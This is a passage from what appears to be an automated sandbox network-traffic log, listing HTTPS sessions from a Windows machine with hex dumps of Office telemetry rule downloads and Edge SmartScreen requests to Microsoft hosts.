2024-11-02 16:56:48 UTC	16384	IN	Data Raw: 04 ba b8 75 26 ce 55 c2 08 bf 5c 90 e7 68 0d 8c 7c 07 bb 14 ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 66 41 16 70 9d 0a 0c Data Ascii: u&U\h\|[T[%6Q+"PR6mU5YgV-HoB /!~qL\|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz\|PVM&UOu~{-oM5QafAp
2024-11-02 16:56:48 UTC	16384	IN	Data Raw: b7 2c 9c d4 28 cd 82 09 ad 54 24 d2 ae 26 b9 4f 37 c4 67 1e 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 90 04 54 de 86 42 2d Data Ascii: ,(T$&O7gkD$>U\|}mlBxz*BFSzP~\|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)\|[U35QTB-
2024-11-02 16:56:48 UTC	16384	IN	Data Raw: 2a 42 7f 7e 14 be 1b ef d2 39 b9 d3 a0 0f a6 db fd c0 cf 6a 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 2c 53 c1 71 b8 50 80 Data Ascii: B~9jsg9P3[=[b'1\%}~i?2tmA@0!0VC\:_Gp`n3.e_j;`?ihbE}Z_"]ya8/b</8iEC>niM]z_]y]DZgtc>qDX\\M,SqP
2024-11-02 16:56:48 UTC	16384	IN	Data Raw: c2 6b ad 8a 70 f5 34 6b b8 40 3f ab 6c ff 6b b9 2f c1 49 79 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 6c b7 99 fc 2e 56 9e Data Ascii: kp4k@?lk/IyMR\!1Q\|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0oj~~{Y1U}n\|?4>tk,OS]\|w}:)y7gg3r#YU]oU~Cl.V
2024-11-02 16:56:48 UTC	16384	IN	Data Raw: 1d c0 e5 f5 0e 81 86 cd d1 7b 9c 8b 16 07 4d 31 65 8e 49 77 c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c bb ed 07 fa bc 5c f7 Data Ascii: {M1eIwyfr;Tt5S};PtEr~uVOLC=A{5__ptHt\|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l\
2024-11-02 16:56:48 UTC	16384	IN	Data Raw: b4 4f 20 01 c9 6e d7 8b d6 eb 26 ee 09 6d 06 c3 c0 20 42 f6 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e bd 4a a1 b3 a7 63 d1 Data Ascii: O n&m Bb.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^\|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>Jc
2024-11-02 16:56:48 UTC	16384	IN	Data Raw: e6 2c b7 a9 5c 69 a3 75 af d9 ba f6 11 ea 58 64 70 1a 03 5a 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 1a ea 09 06 a9 c9 03 Data Ascii: ,\iuXdpZu\m}v0d'R}g]]OZ&z+gK[\|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{O
2024-11-02 16:56:49 UTC	16384	IN	Data Raw: 34 82 9b a9 e1 c3 b1 e1 46 87 99 95 55 9a b4 be 3b 59 b1 6b f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48 82 c0 c8 4e c8 12 40 Data Ascii: 4FU;YkJj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;\|.'Ocl7vUh&n{G]%vHN@
2024-11-02 16:56:49 UTC	16384	IN	Data Raw: 14 85 b6 9f 56 47 3e e9 1b d3 5f a5 ac 50 c3 87 e4 2f 7d 48 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 53 15 5e 3f 60 3e a6 Data Ascii: VG>_P/}HIdqP7J"RUJS<?e3(Z.v4zg9>X#,~0"1OvD#jK_F(Mu,abs&0`K`\|'5Z:-#BoFX1-3JESJY(bJX@D[93&Pq<jy@^2%S^?`>

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.7	49887	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:48 UTC	192	OUT	GET /rules/rule703500v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:48 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:48 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF497570" x-ms-request-id: 9890a075-d01e-002b-06d2-2c25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165648Z-16547b76f7fq9mcrhC1DFWq15w00000000t000000000ng48 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:48 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.7	49888	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:48 UTC	192	OUT	GET /rules/rule701801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:48 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:48 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC2EEE03" x-ms-request-id: 70be0d4d-001e-0017-2cf5-2b0c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165648Z-176bd8f9bc5k68fjhC1DFW9krg000000025g00000000da58 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:48 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.7	49889	13.91.222.61	443	7568	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:48 UTC	734	OUT	POST /api/browser/edge/data/toptraffic/3 HTTP/1.1 Host: data-edge.smartscreen.microsoft.com Connection: keep-alive Content-Length: 746 Accept: application/octet-stream;application/x-patch-bsdiff; Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiSnNjY3FTVTBZQnFFeDd6ZkdBSEJuQT09IiwgImhhc2giOiJlMTlBR0ZGa1hicz0ifQ== Content-Type: application/json; charset=utf-8 If-None-Match: "170540185939602997400506234197983529371" Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br
2024-11-02 16:56:48 UTC	746	OUT	Data Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
2024-11-02 16:56:48 UTC	252	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:48 GMT Content-Type: application/octet-stream Content-Length: 460992 Connection: close Server: Kestrel ETag: "638004170464094982" Request-Context: appId=cid-v1:3d5e3eff-de07-43c3-a15d-06b05ff513c8
2024-11-02 16:56:48 UTC	16132	IN	Data Raw: 00 01 b7 32 6c 49 bd 35 18 3c 43 00 3b d3 7b 9a 00 08 16 f5 5f 2b 6a 45 e7 a6 60 9a c2 7d 9c 16 00 0c 2d 9e cc 04 23 e9 41 f4 82 16 a9 4b 52 db 00 0c 6c e3 4d 30 2c 73 87 bc fb 29 94 39 d4 c2 00 0c b4 d9 e2 eb e5 8f d8 b5 78 ca fa c6 82 9e 00 0c da 46 f1 62 1d cd 1e ab c5 cd 6a 55 ed dc 00 0e 79 d2 8a 68 27 a0 d5 e5 e5 89 bf 4c 3c 1f 00 12 2a 1f c4 5a 99 f8 2a 25 e9 2a 92 1a f6 5f 00 14 b2 67 12 34 79 75 12 bc d6 99 a8 99 1c cc 00 14 c8 bf 10 27 63 3d b9 cd 49 30 99 bf d3 a1 00 17 f8 9d 81 a3 94 71 57 f8 bf 3c 3a 4e ba d2 00 1a 3c bc a6 55 f9 2c 4d 69 94 e9 c9 5f b9 8c 00 1f 17 b3 27 28 0e f5 55 df 39 10 21 05 ce 96 00 1f bc ff bf d8 75 92 d1 13 89 37 0b 86 dc 34 00 20 98 bc 45 61 f8 b8 0d 34 2e 2b fb 37 39 6b 00 21 54 ca 2d 35 57 fb 9f 21 b8 d7 9a 40 2b Data Ascii: 2lI5<C;{_+jE`}-#AKRlM0,s)9xFbjUyh'L<Z%*_g4yu'c=I0qW<:N<U,Mi_'(U9!u74 Ea4.+79k!T-5W!@+
2024-11-02 16:56:48 UTC	16384	IN	Data Raw: b8 6c 65 b5 81 d7 e8 96 a2 f6 fb f5 08 e9 4a 27 41 5a ef 9e 20 88 b1 dd 92 43 f1 c7 08 f6 31 2a b4 6b b0 d0 7b af f2 6e c0 3b 30 49 08 f7 14 46 2e c2 8e a1 9b 56 f6 89 ff 89 a1 a1 08 f8 86 49 94 74 f7 df c7 92 d3 f1 d5 09 db a4 08 f9 bb 85 2c 48 b7 6a b2 fe 9c 06 4c 91 ba af 08 fb 12 e5 67 95 f2 51 95 31 42 c4 14 92 6c 77 08 fb aa 20 c5 0c 96 4a 9a 6f 2e 40 d4 2b fd 90 08 fe aa 92 f9 b3 b3 8f b8 65 27 9b b9 df 14 f7 09 00 34 db 44 0d dd 66 70 53 8f 0b 31 18 8b ba 09 05 38 28 fa 80 5f eb 56 83 46 d1 dd 83 34 b7 09 06 35 0d 42 c1 3f 91 ee 97 ed f4 31 68 37 32 09 08 35 c9 14 24 10 2f b5 80 ac f7 9a 16 e6 e2 09 08 7a 82 38 a3 08 0b 00 2c 62 9c d0 2e d2 c4 09 09 d1 da a7 a8 16 cd 89 e5 ac fe b9 cc 8e 69 09 0e 20 d3 38 58 e2 6b 84 a1 e7 75 97 ad 75 61 09 0e 4d Data Ascii: leJ'AZ C1*k{n;0IF.VIt,HjLgQ1Blw Jo.@+e'4DfpS18(_VF45B?1h725$/z8,b.i 8XkuuaM
2024-11-02 16:56:48 UTC	16384	IN	Data Raw: 88 ca 0d 74 ff b7 03 d5 0b 17 29 2e 12 86 39 8d 65 51 d1 6b 43 f6 37 a6 5e 4e 7e d5 12 8c a6 4c a1 b4 9a f4 6b 69 49 eb 0d 33 90 eb 12 8f 60 36 ec 98 cd 7f 6a 59 fe c5 d1 d5 4b 38 12 92 da 96 3e 8a fd ee fb c5 ac d0 29 b4 8e 13 12 95 25 87 d8 33 f2 c0 16 e8 0f 63 67 d6 78 d1 12 96 03 01 99 d8 95 ea 2c 0a f8 85 62 05 db 93 12 96 52 aa 59 60 de e6 e9 8c 23 d4 b7 c1 34 3d 12 96 bf ae d0 b9 c2 92 db f1 41 07 61 b1 82 5d 12 97 53 89 b5 7c fd 88 82 19 c7 b1 b0 0f af ed 12 98 30 32 6a a5 03 4e 26 db 95 be 1b a9 a3 e2 12 9a ea fe 35 92 c8 f4 3b 7a 18 36 80 cb 78 bf 12 9b 33 a3 9e d9 7b 54 c8 7b da 3b ed a8 dd 25 12 9b 98 d3 83 cc 49 8e 52 58 13 7e 3f 04 d9 af 12 9c 0d 11 dc 93 65 32 c4 f0 f6 a9 12 25 13 25 12 9c 28 31 10 8a f9 38 40 df 1f 08 9f 08 d4 71 12 9f 71 Data Ascii: t).9eQkC7^N~LkiI3`6jYK8>)%3cgx,bRY`#4=Aa]S\|02jN&5;z6x3{T{;%IRX~?e2%%(18@qq
2024-11-02 16:56:48 UTC	16384	IN	Data Raw: 8c e6 1b 88 d1 53 7d a1 f2 bc f6 d3 1b bd 38 be aa 88 bb f2 1c 05 de ac 2c b3 63 c3 1b bf d8 bc e5 a8 4c 42 a1 5e 7d 76 56 07 18 dd 1b c1 05 6e 7a a0 f3 27 8e eb 4f 29 e6 e0 a0 2a 1b c2 a1 45 60 4f 19 d0 fa 94 66 c2 31 56 e0 ac 1b c3 58 61 04 7c 91 76 1b 27 0c 2e 05 4d 26 17 1b c4 0f 81 e0 48 ff 13 e9 e7 fd ae 77 76 47 85 1b c5 d5 9a 68 ef 46 53 52 de 8b 1c 3a 7b 4f 53 1b cc c2 c4 df 4d dc 18 9f 1a a6 aa 47 f5 9f 2e 1b cd 8c 32 11 55 08 6c 9c 2f 0b 09 34 58 ca d2 1b cf 2c 48 15 0b dd b9 a9 cc 90 e8 14 76 e1 c7 1b d1 50 e1 1f 03 b2 ff 0f ab b3 c3 a2 cf c2 1a 1b d6 7a 97 41 b9 a0 2a 37 7b ba 9a 0a 00 47 56 1b da a2 08 31 23 96 3c 24 0a b0 10 2f 5e b6 c3 1b dc 15 6b ce f9 b8 64 db f8 fb 84 2a d6 02 9b 1b dc 58 1e e3 44 3f fb c2 e7 7f 97 d4 41 5f 1c 1b dc 83 Data Ascii: S}8,cLB^}vVnz'O)E`Of1VXa\|v'.M&HwvGhFSR:{OSMG.2Ul/4X,HvPzA7{GV1#<$/^kd*XD?A_
2024-11-02 16:56:48 UTC	16384	IN	Data Raw: 9c f0 8f 05 68 32 cf 23 af 0f e9 31 25 17 e2 83 8c a0 e0 45 41 22 69 ae 51 16 97 9e 25 19 94 88 65 65 22 da 5c e4 68 67 07 cf 5f 7a 25 1e 6a 2e 6e bf 40 39 a7 91 dd 9f 82 5c b4 be 25 21 01 14 90 ab fe fa c5 d4 0a 62 0b cd 30 e1 25 21 03 7a 48 db 3d 1f b8 bc 66 91 12 c8 41 7f 25 24 00 6f 09 69 7b 22 bc d0 5a 82 9d c8 cb 00 25 24 76 95 60 1f 20 bf 51 8e ef 43 af 74 27 17 25 24 d0 90 ec 4d 35 f3 3b 75 d1 b6 56 62 63 3e 25 25 bd 14 86 f0 f0 dc 12 c9 55 32 f1 85 66 4f 25 25 de ea a2 0c 7b b9 31 02 c3 fc 10 0f 92 23 25 27 0a 2e 12 37 63 79 36 e7 03 6f 4c 1e 67 7e 25 29 ef 20 dd 60 cb e0 1f 91 82 96 c4 38 ef d3 25 2c 0d 19 1e 65 a3 27 9b 58 e2 44 e3 80 93 37 25 2c e2 18 e3 78 51 0e b2 f9 62 26 e5 78 8f 9f 25 36 84 bd bb 8f cc a6 bc 42 a8 bf 22 b0 f1 a9 25 3a 54 Data Ascii: h2#1%EA"iQ%ee"\hg_z%j.n@9\%!b0%!zH=fA%$oi{"Z%$v` QCt'%$M5;uVbc>%%U2fO%%{1#%'.7cy6oLg~%) `8%,e'XD7%,xQb&x%6B"%:T
